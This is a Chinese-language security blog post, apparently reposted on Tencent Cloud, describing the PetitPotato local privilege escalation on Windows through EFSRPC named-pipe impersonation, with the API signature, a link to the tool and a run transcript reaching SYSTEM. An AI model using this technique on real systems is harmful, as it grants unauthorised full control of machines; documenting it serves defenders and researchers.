前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Windows提权之PetitPotato

Windows提权之PetitPotato

作者头像
Al1ex
发布2023-03-29 14:15:59
4520
发布2023-03-29 14:15:59
举报
文章被收录于专栏:网络安全攻防
影响范围

Windows 21H2 10.0.20348.1547

漏洞类型

本地提权

漏洞概述

2021年12月微软发布了一个针对不同EFSRPC漏洞的补丁CVE-2021-43217,Microsoft对EFSRPC通信实施了一些强化措施,特别是在使用EFSRPC时,EFSRPC客户端需要使用RPC_C_AUTHN_LEVEL_PKT_PRIVACY,如果客户端未能做到这一点则客户端将被拒绝,并生成一个Windows应用程序事件,这里的MS-EFSR是一种用于对远程存储并通过网络访问的加密数据执行维护和管理操作的协议,该协议有一系列类似EfsRpcOpenFileRaw的API,例如:

代码语言:javascript
复制
long EfsRpcOpenFileRaw(
   [in] handle_t binding_h,
   [out] PEXIMPORT_CONTEXT_HANDLE* hContext,
   [in, string] wchar_t* FileName,
   [in] long Flags
);

这种API可以通过FileName参数指定UNC路径以打开服务器上的加密对象进行备份或恢复,当指定格式为\\IP\C$的路径时,lsass.exe服务将使用NT AUTHORITY系统帐户权限访问\\IP\pipe\srvsvc,如果我们可以调用EfsRpcOpenFileRaw API来强制本地计算机连接到我们创建的恶意命名管道,那么我们就可以模拟命名管道客户端进程并最终获得SYSTEKM权限,但由于相关补丁的限制,使得旧的PetitPotam无法在新版本的Windows上运行,但是在调用EFS之前可以通过RpcBindingSetAuthInfoW将AuthnLevel设置为RPC_C_AUTHN_LEVEL_PKT_PRIVACY在最新的系统上有效

漏洞复现

项目地址:https://github.com/wh0amitz/PetitPotato

代码语言:javascript
复制
C:\Users\Administrator\Desktop>PetitPotato.exe 3 cmd

[+] Malicious named pipe running on \\.\pipe\petit\pipe\srvsvc.
[+] Invoking EfsRpcQueryUsersOnFile with target path: \\localhost/pipe/petit\C$\wh0nqs.txt.
[+] The connection is successful.
[+] ImpersonateNamedPipeClient OK.
[+] OpenThreadToken OK.
[+] DuplicateTokenEx OK.
[+] CreateProcessAsUser OK.
Microsoft Windows [Version 10.0.20348.1547]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>
参考链接

https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/

https://itm4n.github.io/from-rpcview-to-petitpotam/#exploring-the-efsrpc-interface-with-rpcview

https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2023-03-23,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 七芒星实验室 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 影响范围
  • 漏洞类型
  • 漏洞概述
  • 漏洞复现
  • 参考链接
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档